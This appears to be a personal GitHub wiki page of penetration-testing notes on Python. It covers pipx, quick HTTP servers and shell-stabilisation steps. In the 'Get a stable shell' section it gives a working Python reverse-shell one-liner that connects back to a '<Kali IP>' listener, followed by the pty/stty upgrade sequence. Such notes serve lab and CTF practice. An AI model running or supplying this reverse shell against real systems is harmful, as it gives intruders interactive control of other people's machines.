Skip to content

Python

Jump to bottom
Alvin Smith edited this page Apr 9, 2024 · 18 revisions

Resources

pipx install PACKAGE

This automatically creates a virtual environment, installs the package, and adds the package's associated applications (entry points) to a location on your PATH. For example, pipx install pycowsay makes the pycowsay command available globally, but sandboxes the pycowsay package in its own virtual environment. pipx never needs to run as sudo to do this.

https://github.com/pypa/pipx

Adamantly scripts

https://github.com/A1vinSmith/arbitrary-python

Http server

Python2

python -m SimpleHTTPServer 80

Python3

python3 -m http.server The default port is 8000

if not working script /dev/null -c bash

Get a stable shell

  1. Another netcat listener for the below
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<Kali IP>",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  1. However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell.
python -c 'import pty; pty.spawn("/bin/bash")'

or

python3 -c 'import pty; pty.spawn("/bin/bash")'
  1. If phase 2 not make the job done(Python spawn a better-featured bash shell. But still won’t be able to use tab autocomplete or the arrow keys, and Ctrl + C will still kill the shell).
export TERM=xterm // give us access to term commands such as clear.
  1. Press CTRL+Z to put the shell in the background. Next, type this command in the same window: stty raw -echo;fg. This will bring your shell back to the foreground with a fully interactive experience. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.

ps: Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press enter.

  1. OPTIONAL, adjust tty size
❯ tput cols
124
                                                                                                                            
❯ tput lines
56

stty rows 56 columns 124

Handle Hex

0x2f6574632f686f73746e616d65
print(bytes.fromhex('2f6574632f686f73746e616d65'))

0x20
print(bytes.fromhex('20'))
Clone this wiki locally